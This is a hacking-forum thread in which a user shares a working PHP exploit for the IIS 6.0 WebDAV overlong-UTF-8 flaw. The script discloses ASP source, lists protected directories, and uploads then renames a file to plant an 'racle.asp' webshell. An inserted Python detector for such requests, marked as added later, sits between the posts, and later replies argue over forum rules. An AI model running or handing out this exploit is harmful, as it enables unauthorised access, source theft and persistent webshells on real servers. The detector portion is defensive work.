[shared] IIS/6.0 server exploit PHP

Forum for discussing everything about web hacking, from footprinting, scanning, gaining access, privilege escalation, exploitation, covering tracks and backdoors to securing the web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Discuss bugs, penetration, exploitation and techniques for securing websites and web servers. Include a PoC here so that members can learn from it
Post by wiLMaR_kiDz » Mon Nov 16, 2009 9:18 pm

:kaca: :kaca: :kaca: :kaca: :kaca:
CODE
<?

print_r('
******** IIS 6 WEBDAV Exploit.By [email protected] && Securiteweb.org ********

Usage: php '.$argv[0].' source/path/put host path
Example: php '.$argv[0].' source http://www.tian6.com /blog/readme.asp
Example2: php '.$argv[0].' path http://www.tian6.com /secret/
Example3: php '.$argv[0].' put http://www.tian6.com /secret/ test.txt(evil code as test.txt)
****************************************************************
');

// initial argument checks
if($argv[1]!="source"&&$argv[1]!="path"&&$argv[1]!="put"){echo "Choose a action,source or path or put.";die;}
else {$action=$argv[1];}

if(stristr($argv[2],"http://")){echo "No http:// in the host!";die;}
else{$host=$argv[2];}

if(stristr($argv[3],"/")==false){echo "Where is the / ?";die;}
else{$path=$argv[3];}


//sent
function sent($sock)
{
global $host, $html;
$ock=fsockopen(gethostbyname($host),'80');
if (!$ock) {
echo 'No response from '.$host; die;
}
fputs($ock,$sock);
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
fclose($ock);
}

if($action=="source"){
$position=strrpos($path,"/");
$path=substr_replace($path,"%c0%af/",$position,1);
$sock="GET ".$path." HTTP/1.1\r\n";
$sock.="Translate: f\r\n";
$sock.="Host: ".$host."\r\n";
$sock.="Connection:close\r\n\r\n";
sent($sock);
echo $html;
die;
}


if($action=="path"){
$position=strrpos($path,"/");
$path=substr_replace($path,"%c0%af",$position,0);
$sock="PROPFIND ".$path." HTTP/1.1\r\n";
$sock.="Host: ".$host."\r\n";
$sock.="Connection:close\r\n";
$sock.='Content-Type: text/xml; charset="utf-8"'."\r\n";
$sock.="Content-Length: 0\r\n\r\n";
$sock.='<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://www.foo.bar/boxschema/"><R:bigbo ... D:propfind>';
sent($sock);
$bur=explode("<a:href>",$html);
foreach($bur as $line){$no=strpos($line,"<");$resultat.=substr($line,0,$no)."\n";}
echo $resultat;
die;
}


if($action=="put"){
echo "Remember,keep urfile in type txt!\r\n\r\n";
$fp = fopen("test.txt", 'r');
if($fp!=false){
while (false!==($char = fgets($fp))) {
$fir1 .= $char; # fix: hoahongtim Team: hvaonline.net
}
fclose($fp);
$position=strrpos($path,"/");
$path=substr_replace($path,"%c0%af",$position,0);
$sock="PUT ".$path."test.txt HTTP/1.1\r\n";
$sock.="Host: ".$host."\r\n";
$sock.='Content-Type: text/xml; charset="utf-8"'."\r\n";
$sock.="Connection:close\r\n";
$sock.="Content-Length: ".strlen($fir1)."\r\n\r\n";
$sock.="".$fir1."\r\n";
echo $sock; sent($sock);sleep(2);
$sock="MOVE ".$path."test.txt HTTP/1.1\r\n";
$sock.="Host: ".$host."\r\n";
$sock.="Connection:close\r\n";
$sock.="Destination: ".$path."racle.asp\n\n";
sent($sock);
echo "Be cool,man! Webshell is http://".$host.$path."racle.asp";
die;}
else{die;}
}
:omg: :omg: :omg: :omg: :omg:
regards,
ordinary user,-
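
The requests built by the script above share recognizable traits: an overlong UTF-8 encoding of `/` (`%c0%af`) in the path, sent together with either a `Translate: f` header or a WebDAV method. The detector below is an added example, not part of the original thread; it generalizes to any overlong UTF-8 sequence in the path, and the function name, finding labels, sample requests and the host `iis.example.test` are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Methods the posted script pairs with the encoded path (besides GET + Translate: f).
WEBDAV_METHODS = {"PROPFIND", "PUT", "MOVE"}
# Overlong UTF-8 forms: C0/C1 lead bytes are never valid; E0 80-9F and F0 80-8F
# are the 3- and 4-byte overlong ranges. %c0%af is the overlong form of "/".
OVERLONG = re.compile(
    rb"[\xc0\xc1][\x80-\xbf]|\xe0[\x80-\x9f][\x80-\xbf]|\xf0[\x80-\x8f][\x80-\xbf]{2}"
)

def inspect_request(raw: bytes) -> list:
    """Return a list of findings for one raw HTTP request (the head is enough)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        return ["malformed-request-line"]
    method, target, _version = parts
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    # Percent-decode the path only; hex digits are handled case-insensitively.
    path = unquote_to_bytes(target.split("?", 1)[0])
    if not OVERLONG.search(path):
        return []
    findings = ["overlong-utf8-in-path"]
    if method.upper() in WEBDAV_METHODS:
        findings.append("webdav-method-with-overlong-path")
    if headers.get("translate", "").lower() == "f":
        findings.append("translate-f-with-overlong-path")
    return findings

# Constructed sample requests (host and paths are placeholders).
SAMPLES = {
    "source-style": b"GET /blog%c0%af/readme.asp HTTP/1.1\r\nTranslate: f\r\n"
                    b"Host: iis.example.test\r\nConnection:close\r\n\r\n",
    "listing-style": b"PROPFIND /secret%C0%AF/ HTTP/1.1\r\nHost: iis.example.test\r\n"
                     b"Content-Length: 0\r\n\r\n",
    "plain-get": b"GET /blog/readme.asp HTTP/1.1\r\nHost: iis.example.test\r\n\r\n",
    "normal-webdav": b"PROPFIND /docs/ HTTP/1.1\r\nHost: iis.example.test\r\n\r\n",
    "valid-utf8": b"GET /caf%C3%A9/menu.asp HTTP/1.1\r\nHost: iis.example.test\r\n\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:14} {inspect_request(raw) or 'clean'}")
```

The findings are keyed on the overlong sequence rather than on `Translate: f` or the WebDAV verbs alone, because legitimate WebDAV clients send both of those in normal use.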

Post by franky_muchtar » Sun Jan 24, 2010 9:23 pm

Forum rules said that "Include a PoC here so that members can learn from it" so, Where is POC?

Post by wiLMaR_kiDz » Mon Jan 25, 2010 12:56 am

ngelih wrote: Forum rules said that "Include a PoC here so that members can learn from it" so, Where is POC?
Well, when were the forum rules written, and when was this thread made, bro?? As far as I recall, this thread came first..
:ngakak: :ngakak:
Take a good look, the PoC is already included above....
You just need to upload it to a web server.. And what's below, that's all the exploit code....


Thanks-
regards,
ordinary user,-
